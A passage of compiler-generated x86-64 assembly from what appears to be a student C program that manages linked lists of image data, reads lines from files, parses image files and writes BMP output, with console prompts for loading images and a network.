leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB11_9
## %bb.8:
movq -16(%rbp), %rax
movq 24(%rax), %rsi
leaq L_.str.12(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB11_9:
jmp LBB11_11
LBB11_10:
leaq L_.str.14(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB11_11:
jmp LBB11_12
LBB11_12:
jmp LBB11_14
LBB11_13:
leaq L_.str.15(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movl $1, %edi
callq _exit
LBB11_14:
movq -24(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _initNode ## -- Begin function initNode
.p2align 4, 0x90
_initNode: ## @initNode
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
leaq 16(%rbp), %rax
movq %rax, -24(%rbp) ## 8-byte Spill
movl $40, %edi
callq _malloc
movq %rax, %rcx
movq -24(%rbp), %rax ## 8-byte Reload
movq %rcx, -8(%rbp)
movslq 24(%rax), %rdi
shlq $2, %rdi
callq _malloc
movq %rax, %rcx
movq -8(%rbp), %rax
movq %rcx, 16(%rax)
cmpq $0, -8(%rbp)
jne LBB12_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.16(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB12_2:
movq -24(%rbp), %rax ## 8-byte Reload
movl 12(%rax), %edx
movq -8(%rbp), %rcx
movl %edx, 12(%rcx)
movl 8(%rax), %edx
movq -8(%rbp), %rcx
movl %edx, 8(%rcx)
movl 4(%rax), %edx
movq -8(%rbp), %rcx
movl %edx, 4(%rcx)
movl 24(%rax), %edx
movq -8(%rbp), %rcx
movl %edx, 24(%rcx)
movl (%rax), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
movl $0, -12(%rbp)
LBB12_3: ## =>This Inner Loop Header: Depth=1
movq -24(%rbp), %rcx ## 8-byte Reload
movl -12(%rbp), %eax
cmpl 24(%rcx), %eax
jge LBB12_6
## %bb.4: ## in Loop: Header=BB12_3 Depth=1
movq -24(%rbp), %rax ## 8-byte Reload
movq 16(%rax), %rax
movslq -12(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -12(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
## %bb.5: ## in Loop: Header=BB12_3 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB12_3
LBB12_6:
movq -8(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _initListe ## -- Begin function initListe
.p2align 4, 0x90
_initListe: ## @initListe
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $24, %edi
callq _malloc
movq %rax, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB13_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.17(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB13_2:
movq -8(%rbp), %rax
movl $0, (%rax)
movq -8(%rbp), %rax
movq $0, 8(%rax)
movq -8(%rbp), %rax
movq $0, 16(%rax)
movq -8(%rbp), %rax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _addTail ## -- Begin function addTail
.p2align 4, 0x90
_addTail: ## @addTail
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
leaq 16(%rbp), %rax
movq %rdi, -8(%rbp)
movq (%rax), %rcx
movq %rcx, (%rsp)
movq 8(%rax), %rcx
movq %rcx, 8(%rsp)
movq 16(%rax), %rcx
movq %rcx, 16(%rsp)
movq 24(%rax), %rax
movq %rax, 24(%rsp)
callq _initNode
movq %rax, -16(%rbp)
movq -16(%rbp), %rax
movq $0, 32(%rax)
movq -8(%rbp), %rax
cmpl $0, (%rax)
jle LBB14_2
## %bb.1:
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq 16(%rax), %rax
movq %rcx, 32(%rax)
jmp LBB14_3
LBB14_2:
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
LBB14_3:
movq -16(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 16(%rax)
movq -8(%rbp), %rax
movl (%rax), %ecx
addl $1, %ecx
movl %ecx, (%rax)
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _affiche ## -- Begin function affiche
.p2align 4, 0x90
_affiche: ## @affiche
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -16(%rbp)
LBB15_1: ## =>This Loop Header: Depth=1
## Child Loop BB15_3 Depth 2
cmpq $0, -16(%rbp)
je LBB15_7
## %bb.2: ## in Loop: Header=BB15_1 Depth=1
movl $0, -20(%rbp)
LBB15_3: ## Parent Loop BB15_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -20(%rbp), %eax
movq -16(%rbp), %rcx
cmpl 24(%rcx), %eax
jge LBB15_6
## %bb.4: ## in Loop: Header=BB15_3 Depth=2
movq -16(%rbp), %rax
movq 16(%rax), %rax
movslq -20(%rbp), %rcx
movl (%rax,%rcx,4), %esi
leaq L_.str.18(%rip), %rdi
movb $0, %al
callq _printf
## %bb.5: ## in Loop: Header=BB15_3 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB15_3
LBB15_6: ## in Loop: Header=BB15_1 Depth=1
leaq L_.str.19(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rax
movq 32(%rax), %rax
movq %rax, -16(%rbp)
jmp LBB15_1
LBB15_7:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _get_line ## -- Begin function get_line
.p2align 4, 0x90
_get_line: ## @get_line
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq $80, -16(%rbp)
movq -16(%rbp), %rdi
callq _malloc
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
je LBB16_19
## %bb.1:
movq $0, -40(%rbp)
movq -8(%rbp), %rdi
callq _fgetc
movl %eax, -28(%rbp)
cmpl $-1, %eax
jne LBB16_3
## %bb.2:
movq -24(%rbp), %rdi
callq _free
movq $0, -24(%rbp)
jmp LBB16_14
LBB16_3:
jmp LBB16_4
LBB16_4: ## =>This Inner Loop Header: Depth=1
movq -40(%rbp), %rax
movq -16(%rbp), %rcx
subq $1, %rcx
cmpq %rcx, %rax
jne LBB16_9
## %bb.5: ## in Loop: Header=BB16_4 Depth=1
movq -24(%rbp), %rdi
movq -16(%rbp), %rsi
addq $80, %rsi
callq _realloc
movq %rax, -48(%rbp)
cmpq $0, -48(%rbp)
je LBB16_7
## %bb.6: ## in Loop: Header=BB16_4 Depth=1
movq -48(%rbp), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
addq $80, %rax
movq %rax, -16(%rbp)
jmp LBB16_8
LBB16_7: ## in Loop: Header=BB16_4 Depth=1
movq -24(%rbp), %rdi
callq _free
movq $0, -24(%rbp)
LBB16_8: ## in Loop: Header=BB16_4 Depth=1
jmp LBB16_9
LBB16_9: ## in Loop: Header=BB16_4 Depth=1
movl -28(%rbp), %eax
movb %al, %dl
movq -24(%rbp), %rax
movq -40(%rbp), %rcx
movb %dl, (%rax,%rcx)
movq -40(%rbp), %rax
addq $1, %rax
movq %rax, -40(%rbp)
## %bb.10: ## in Loop: Header=BB16_4 Depth=1
movq -8(%rbp), %rdi
callq _fgetc
movl %eax, %ecx
movl %ecx, -28(%rbp)
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $10, %ecx
movb %al, -49(%rbp) ## 1-byte Spill
je LBB16_12
## %bb.11: ## in Loop: Header=BB16_4 Depth=1
cmpl $-1, -28(%rbp)
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB16_12: ## in Loop: Header=BB16_4 Depth=1
movb -49(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB16_4
## %bb.13:
jmp LBB16_14
LBB16_14:
movq -8(%rbp), %rdi
callq _ferror
cmpl $0, %eax
je LBB16_16
## %bb.15:
movq -24(%rbp), %rdi
callq _free
movq $0, -24(%rbp)
LBB16_16:
cmpq $0, -24(%rbp)
je LBB16_18
## %bb.17:
movq -24(%rbp), %rax
movq -40(%rbp), %rcx
movb $0, (%rax,%rcx)
LBB16_18:
jmp LBB16_19
LBB16_19:
movq -24(%rbp), %rax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _saveBMP ## -- Begin function saveBMP
.p2align 4, 0x90
_saveBMP: ## @saveBMP
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $128, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl %edi, -68(%rbp)
movl %esi, -72(%rbp)
movq %rdx, -80(%rbp)
movq %rcx, -88(%rbp)
imull $3, -68(%rbp), %eax
movl $4, %ecx
cltd
idivl %ecx
movl $4, %eax
subl %edx, %eax
movl $4, %ecx
cltd
idivl %ecx
movl %edx, -92(%rbp)
imull $3, -68(%rbp), %eax
addl -92(%rbp), %eax
imull -72(%rbp), %eax
addl $54, %eax
movl %eax, -96(%rbp)
leaq -64(%rbp), %rdi
xorl %esi, %esi
movl $54, %edx
callq _memset
movb $66, -64(%rbp)
movb $77, -63(%rbp)
movb $54, -54(%rbp)
movb $40, -50(%rbp)
movb $1, -38(%rbp)
movb $24, -36(%rbp)
leaq -99(%rbp), %rdi
xorl %esi, %esi
movl $3, %edx
callq _memset
movl $0, -124(%rbp)
LBB17_1: ## =>This Inner Loop Header: Depth=1
cmpl $4, -124(%rbp)
jge LBB17_4
## %bb.2: ## in Loop: Header=BB17_1 Depth=1
movl -96(%rbp), %eax
movl -124(%rbp), %ecx
shll $3, %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
andl $255, %eax
movb %al, %cl
movl -124(%rbp), %eax
addl $2, %eax
cltq
movb %cl, -64(%rbp,%rax)
movl -68(%rbp), %eax
movl -124(%rbp), %ecx
shll $3, %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
andl $255, %eax
movb %al, %cl
movl -124(%rbp), %eax
addl $18, %eax
cltq
movb %cl, -64(%rbp,%rax)
movl -72(%rbp), %eax
movl -124(%rbp), %ecx
shll $3, %ecx
## kill: def $cl killed $ecx
sarl %cl, %eax
andl $255, %eax
movb %al, %cl
movl -124(%rbp), %eax
addl $22, %eax
cltq
movb %cl, -64(%rbp,%rax)
## %bb.3: ## in Loop: Header=BB17_1 Depth=1
movl -124(%rbp), %eax
addl $1, %eax
movl %eax, -124(%rbp)
jmp LBB17_1
LBB17_4:
movslq -68(%rbp), %rax
imulq $3, %rax, %rdi
movslq -72(%rbp), %rax
imulq %rax, %rdi
callq _malloc
movq %rax, -112(%rbp)
cmpq $0, -112(%rbp)
jne LBB17_6
## %bb.5:
leaq L_.str.20(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB17_18
LBB17_6:
movl $0, -124(%rbp)
LBB17_7: ## =>This Inner Loop Header: Depth=1
movl -124(%rbp), %eax
movl -68(%rbp), %ecx
imull -72(%rbp), %ecx
cmpl %ecx, %eax
jge LBB17_10
## %bb.8: ## in Loop: Header=BB17_7 Depth=1
movq -80(%rbp), %rax
movslq -124(%rbp), %rcx
movl (%rax,%rcx,4), %eax
movl %eax, -128(%rbp)
movl -128(%rbp), %eax
andl $255, %eax
movb %al, %dl
movq -112(%rbp), %rax
imull $3, -124(%rbp), %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
movq -112(%rbp), %rax
imull $3, -124(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
movq -112(%rbp), %rax
imull $3, -124(%rbp), %ecx
addl $2, %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
## %bb.9: ## in Loop: Header=BB17_7 Depth=1
movl -124(%rbp), %eax
addl $1, %eax
movl %eax, -124(%rbp)
jmp LBB17_7
LBB17_10:
movq -88(%rbp), %rdi
leaq L_.str.21(%rip), %rsi
callq _fopen
movq %rax, -120(%rbp)
cmpq $0, -120(%rbp)
jne LBB17_12
## %bb.11:
movq -88(%rbp), %rsi
leaq L_.str.22(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB17_17
LBB17_12:
leaq -64(%rbp), %rdi
movq -120(%rbp), %rcx
movl $54, %esi
movl $1, %edx
callq _fwrite
movl -72(%rbp), %eax
subl $1, %eax
movl %eax, -124(%rbp)
LBB17_13: ## =>This Inner Loop Header: Depth=1
cmpl $0, -124(%rbp)
jl LBB17_16
## %bb.14: ## in Loop: Header=BB17_13 Depth=1
movq -112(%rbp), %rdi
imull $3, -68(%rbp), %eax
imull -124(%rbp), %eax
cltq
addq %rax, %rdi
movslq -68(%rbp), %rax
imulq $3, %rax, %rsi
movq -120(%rbp), %rcx
movl $1, %edx
callq _fwrite
leaq -99(%rbp), %rdi
movl -92(%rbp), %eax
movl %eax, %esi
movq -120(%rbp), %rcx
movl $1, %edx
callq _fwrite
## %bb.15: ## in Loop: Header=BB17_13 Depth=1
movl -124(%rbp), %eax
addl $-1, %eax
movl %eax, -124(%rbp)
jmp LBB17_13
LBB17_16:
movq -120(%rbp), %rdi
callq _fclose
LBB17_17:
movq -112(%rbp), %rdi
callq _free
LBB17_18:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB17_20
## %bb.19:
addq $128, %rsp
popq %rbp
retq
LBB17_20:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function loadImg
LCPI18_0:
.quad 0x4024000000000000 ## double 10
.section __TEXT,__text,regular,pure_instructions
.globl _loadImg
.p2align 4, 0x90
_loadImg: ## @loadImg
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $128, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
callq _get_line
movq %rax, -24(%rbp)
movq -24(%rbp), %rdi
callq _strlen
movq %rax, -32(%rbp)
movl $32, %edi
callq _malloc
movq %rax, -40(%rbp)
movl $4, %edi
callq _malloc
movq %rax, %rcx
movq -40(%rbp), %rax
movq %rcx, 16(%rax)
movq -24(%rbp), %rdi
leaq L_.str.23(%rip), %rsi
callq _strtok
movq %rax, -48(%rbp)
movq -48(%rbp), %rdi
callq _atoi
movl %eax, -52(%rbp)
xorl %eax, %eax
movl %eax, %edi
leaq L_.str.23(%rip), %rsi
callq _strtok
movq %rax, -48(%rbp)
movq -48(%rbp), %rdi
callq _atoi
movl %eax, -56(%rbp)
xorl %eax, %eax
movl %eax, %edi
leaq L_.str.23(%rip), %rsi
callq _strtok
movq %rax, -48(%rbp)
movq -48(%rbp), %rdi
callq _atoi
movl %eax, -60(%rbp)
LBB18_1: ## =>This Loop Header: Depth=1
## Child Loop BB18_3 Depth 2
## Child Loop BB18_5 Depth 3
## Child Loop BB18_9 Depth 3
movq -8(%rbp), %rdi
callq _get_line
movq %rax, -24(%rbp)
cmpq $0, %rax
je LBB18_17
## %bb.2: ## in Loop: Header=BB18_1 Depth=1
movl -52(%rbp), %ecx
movq -40(%rbp), %rax
movl %ecx, (%rax)
movl -56(%rbp), %ecx
movq -40(%rbp), %rax
movl %ecx, 8(%rax)
movl -60(%rbp), %ecx
movq -40(%rbp), %rax
movl %ecx, 4(%rax)
movl $0, -64(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -72(%rbp)
movl $0, -76(%rbp)
movq -24(%rbp), %rdi
leaq L_.str.23(%rip), %rsi
callq _strtok
movq %rax, -48(%rbp)
movq -48(%rbp), %rdi
callq _atoi
movl %eax, %ecx
movq -40(%rbp), %rax
movl %ecx, 12(%rax)
xorl %eax, %eax
movl %eax, %edi
leaq L_.str.23(%rip), %rsi
callq _strtok
movq %rax, -48(%rbp)
LBB18_3: ## Parent Loop BB18_1 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB18_5 Depth 3
## Child Loop BB18_9 Depth 3
movq -48(%rbp), %rdi
movl $44, %esi
callq _strchr
cmpq $0, %rax
je LBB18_13
## %bb.4: ## in Loop: Header=BB18_3 Depth=2
movq -48(%rbp), %rax
movb $46, 1(%rax)
movq -48(%rbp), %rdi
callq _strlen
movq %rax, -32(%rbp)
movq -48(%rbp), %rdi
callq _atof
movsd %xmm0, -72(%rbp)
movl $0, -80(%rbp)
LBB18_5: ## Parent Loop BB18_1 Depth=1
## Parent Loop BB18_3 Depth=2
## => This Inner Loop Header: Depth=3
movslq -80(%rbp), %rax
movq -32(%rbp), %rcx
subq $2, %rcx
cmpq %rcx, %rax
jae LBB18_8
## %bb.6: ## in Loop: Header=BB18_5 Depth=3
movsd LCPI18_0(%rip), %xmm0 ## xmm0 = mem[0],zero
mulsd -72(%rbp), %xmm0
movsd %xmm0, -72(%rbp)
## %bb.7: ## in Loop: Header=BB18_5 Depth=3
movl -80(%rbp), %eax
addl $1, %eax
movl %eax, -80(%rbp)
jmp LBB18_5
LBB18_8: ## in Loop: Header=BB18_3 Depth=2
cvttsd2si -72(%rbp), %eax
movl %eax, -76(%rbp)
movl $0, -84(%rbp)
LBB18_9: ## Parent Loop BB18_1 Depth=1
## Parent Loop BB18_3 Depth=2
## => This Inner Loop Header: Depth=3
movl -84(%rbp), %eax
cmpl -76(%rbp), %eax
jge LBB18_12
## %bb.10: ## in Loop: Header=BB18_9 Depth=3
movq -40(%rbp), %rax
movq 16(%rax), %rax
movslq -64(%rbp), %rcx
movl $0, (%rax,%rcx,4)
movq -40(%rbp), %rax
movq 16(%rax), %rdi
movl -64(%rbp), %eax
addl $1, %eax
movslq %eax, %rsi
shlq $5, %rsi
callq _realloc
movq %rax, %rcx
movq -40(%rbp), %rax
movq %rcx, 16(%rax)
movl -64(%rbp), %eax
addl $1, %eax
movl %eax, -64(%rbp)
## %bb.11: ## in Loop: Header=BB18_9 Depth=3
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
jmp LBB18_9
LBB18_12: ## in Loop: Header=BB18_3 Depth=2
jmp LBB18_14
LBB18_13: ## in Loop: Header=BB18_3 Depth=2
movq -48(%rbp), %rdi
callq _atoi
cvtsi2sd %eax, %xmm0
movsd %xmm0, -72(%rbp)
cvttsd2si -72(%rbp), %edx
movq -40(%rbp), %rax
movq 16(%rax), %rax
movslq -64(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
movq -40(%rbp), %rax
movq 16(%rax), %rdi
movl -64(%rbp), %eax
addl $1, %eax
movslq %eax, %rsi
shlq $5, %rsi
callq _realloc
movq %rax, %rcx
movq -40(%rbp), %rax
movq %rcx, 16(%rax)
movl -64(%rbp), %eax
addl $1, %eax
movl %eax, -64(%rbp)
LBB18_14: ## in Loop: Header=BB18_3 Depth=2
xorl %eax, %eax
movl %eax, %edi
leaq L_.str.23(%rip), %rsi
callq _strtok
movq %rax, -48(%rbp)
## %bb.15: ## in Loop: Header=BB18_3 Depth=2
cmpq $0, -48(%rbp)
jne LBB18_3
## %bb.16: ## in Loop: Header=BB18_1 Depth=1
movl -64(%rbp), %ecx
movq -40(%rbp), %rax
movl %ecx, 24(%rax)
movq -16(%rbp), %rdi
movq -40(%rbp), %rax
movq (%rax), %rcx
movq %rcx, (%rsp)
movq 8(%rax), %rcx
movq %rcx, 8(%rsp)
movq 16(%rax), %rcx
movq %rcx, 16(%rsp)
movq 24(%rax), %rax
movq %rax, 24(%rsp)
callq _addTail
jmp LBB18_1
LBB18_17:
movq -40(%rbp), %rax
movq 16(%rax), %rdi
callq _free
movq -40(%rbp), %rdi
callq _free
movq -48(%rbp), %rdi
callq _free
movq -24(%rbp), %rdi
callq _free
addq $128, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _InterfaceControleChaine ## -- Begin function InterfaceControleChaine
.p2align 4, 0x90
_InterfaceControleChaine: ## @InterfaceControleChaine
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq $0, -16(%rbp)
movl $0, -20(%rbp)
movl $0, -24(%rbp)
movl $0, -28(%rbp)
LBB19_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
cmpb $0, (%rax,%rcx)
je LBB19_8
## %bb.2: ## in Loop: Header=BB19_1 Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $32, %eax
je LBB19_6
## %bb.3: ## in Loop: Header=BB19_1 Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $9, %eax
je LBB19_6
## %bb.4: ## in Loop: Header=BB19_1 Depth=1
movq -8(%rbp), %rax
movslq -28(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $10, %eax
je LBB19_6
## %bb.5: ## in Loop: Header=BB19_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
LBB19_6: ## in Loop: Header=BB19_1 Depth=1
jmp LBB19_7
LBB19_7: ## in Loop: Header=BB19_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB19_1
LBB19_8:
movslq -20(%rbp), %rdi
shlq $0, %rdi
callq _malloc
movq %rax, -16(%rbp)
movl $0, -32(%rbp)
LBB19_9: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
cmpb $0, (%rax,%rcx)
je LBB19_16
## %bb.10: ## in Loop: Header=BB19_9 Depth=1
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $32, %eax
je LBB19_14
## %bb.11: ## in Loop: Header=BB19_9 Depth=1
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $9, %eax
je LBB19_14
## %bb.12: ## in Loop: Header=BB19_9 Depth=1
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $10, %eax
je LBB19_14
## %bb.13: ## in Loop: Header=BB19_9 Depth=1
movq -8(%rbp), %rax
movslq -32(%rbp), %rcx
movb (%rax,%rcx), %dl
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
movb %dl, (%rax,%rcx)
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
LBB19_14: ## in Loop: Header=BB19_9 Depth=1
jmp LBB19_15
LBB19_15: ## in Loop: Header=BB19_9 Depth=1
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB19_9
LBB19_16:
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
movb $0, (%rax,%rcx)
movq -16(%rbp), %rax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _toUpper ## -- Begin function toUpper
.p2align 4, 0x90
_toUpper: ## @toUpper
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
LBB20_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
cmpb $0, (%rax,%rcx)
je LBB20_7
## %bb.2: ## in Loop: Header=BB20_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $97, %eax
jl LBB20_5
## %bb.3: ## in Loop: Header=BB20_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $122, %eax
jg LBB20_5
## %bb.4: ## in Loop: Header=BB20_1 Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
subl $97, %eax
addl $65, %eax
movb %al, %dl
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movb %dl, (%rax,%rcx)
LBB20_5: ## in Loop: Header=BB20_1 Depth=1
jmp LBB20_6
LBB20_6: ## in Loop: Header=BB20_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB20_1
LBB20_7:
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _InterLoadImage ## -- Begin function InterLoadImage
.p2align 4, 0x90
_InterLoadImage: ## @InterLoadImage
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq $0, -8(%rbp)
movl $1024, %edi ## imm = 0x400
callq _malloc
movq %rax, -16(%rbp)
movl $1024, %edi ## imm = 0x400
callq _malloc
movq %rax, -24(%rbp)
movq $0, -32(%rbp)
movq $0, -40(%rbp)
leaq L_.str.53(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
movq -16(%rbp), %rdi
callq _InterfaceControleChaine
movq %rax, -40(%rbp)
movq -40(%rbp), %rdi
callq _toUpper
movq -40(%rbp), %rdi
leaq L_.str.44(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB21_4
## %bb.1:
leaq L_.str.54(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
movl $1024, %esi ## imm = 0x400
callq _fgets
movq -24(%rbp), %rdi
callq _InterfaceControleChaine
movq %rax, -32(%rbp)
movq -32(%rbp), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB21_3
## %bb.2:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.55(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB21_3:
jmp LBB21_7
LBB21_4:
leaq L_.str.56(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.57(%rip), %rdi
leaq L_.str.11(%rip), %rsi
callq _fopen
movq %rax, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB21_6
## %bb.5:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.58(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _fprintf
movl $1, %edi
callq _exit
LBB21_6:
jmp LBB21_7
LBB21_7:
movq -8(%rbp), %rax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _avancerGetchar ## -- Begin function avancerGetchar
.p2align 4, 0x90
_avancerGetchar: ## @avancerGetchar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq L_.str.59(%rip), %rdi
movb $0, %al
callq _printf
callq _getchar
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _InterLoadNetwork ## -- Begin function InterLoadNetwork
.p2align 4, 0x90
_InterLoadNetwork: ## @InterLoadNetwork
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq $0, -8(%rbp)
movl $1024, %edi ## imm = 0x400
movq %rdi, -56(%rbp) ## 8-byte Spill
callq _malloc
movq -56(%rbp), %rdi ## 8-byte Reload
movq %rax, -24(%rbp)
callq _malloc
movq %rax, -32(%rbp)
movq $0, -40(%rbp)
leaq L_.str.60(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movb %al, -41(%rbp) ## 1-byte Spill
callq _printf
## kill: def $ecx killed $eax
movb -41(%rbp), %al ## 1-byte Reload
leaq L_.str.61(%rip), %rdi
callq _printf
movq -24(%rbp), %rdi
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
